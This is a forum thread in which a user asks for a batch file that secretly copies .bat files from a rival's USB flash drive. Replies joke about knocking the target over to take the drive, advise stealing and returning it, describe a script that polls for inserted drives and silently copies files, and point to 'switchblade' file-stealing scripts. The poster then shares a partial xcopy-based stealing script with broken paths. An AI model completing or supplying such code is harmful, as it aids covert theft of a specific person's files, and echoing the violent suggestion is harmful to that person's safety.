Rip MultiTool

jht129

archenemy... 4 mabye 5yro?....

umm hmm stealing a batch file from a flashdrive... well have u heard of a technique called hit and run? pretty much involves a car a few mates and a target... but im sure a bat could be substituted depending on ur age...

Smack him over, steal his flash drive copy it and return it to his pocket b4 he regains his sences...

(i dont support any of what i just said, nor do i support stupid threads,,,)

*sigh*

Some part of me wants to help, it's my nature.

Steal the flash drive, copy, place it somewhere it's likely he could've left it.

The less obvious way is to prepare an app/batch that steals batch files from USB drives. This batch file would in theory keep checking for the presence of a flash drive and when it's plugged in it would copy anything called *.bat from the drive.

Oh man, thanks for the second suggestion. I really dont know that much coding, so could you please help me out *again* *sorry* a little bit here. How would I go about coding a batch to detect the presence of another flash drive and copy all .bat files from there? thanks! i appreciate it.

Check out the switchblade stuff, there's batch stuff for both checking for a flash drive and script for stealing files, add them together and you've got what you want.

Wow moonlit, :P you must've been in a good mood when you posted this, I expected flaming (or locking).

Also, @ jht129, though I may not be an admin, it's probably better for you to look around a bit more before asking questions, because wether or not you know what you're doing (I wont make any assumptions) but it makes it look like you're leaching off everyone else when you ask before searching first. It's great to ask questions, but look around google and this site (mainly the wiki) before you ask questions :) . You'll be suprised how many times this solves the problem first.

</thread>

</soapbox>

Well, I've given an answer that would get the file but I personally think that if you want this petty, pathetic, pointless, annoying, immature BS kind of batch file that the OP is trying to get you might at least try to write it yourself or even FIND it yourself.

I can understand not re-inventing the wheel, but if you're gonna waste your time trying to get people to give you tools to screw over classmates or screw a 'friend's' computer you should do it yourself, I'm not gonna be the one to give you a free pass to being an annoying little fuckwit and I doubt other people here will either.

</soapbox>

<thread>

*sigh*

Some part of me wants to help, it's my nature.

Steal the flash drive, copy, place it somewhere it's likely he could've left it.

The less obvious way is to prepare an app/batch that steals batch files from USB drives. This batch file would in theory keep checking for the presence of a flash drive and when it's plugged in it would copy anything called *.bat from the drive.

thats exactly what i was thinking.

yessir im done with that, heres what i have so far:

echo off

echo This batch file stealing program will grab the files ending in .bat

echo on the drives specified previously and copy them

echo to a folder called "RMA X" on your desktop.

pause

%homedrive%

cd "%homepath%Documents and SettingsAll Users"

md "RMA X"

cd "RMA X"

xcopy A:*.bat /q /r /y

xcopy B:*.bat /q /r /y

xcopy C:*.bat /q /r /y

xcopy D:*.bat /q /r /y

Thats only the beginning part. I want to know how to change the directory to where it keeps the files to C:Documents and SettingsAll Users. How would I do this. Note where it says

"%homedrive%

cd "%homepath%Documents and SettingsAll Users"

md "RMA X"

cd "RMA X""

I want it to change it to the directory mentioned above. Does anyone have any solutions?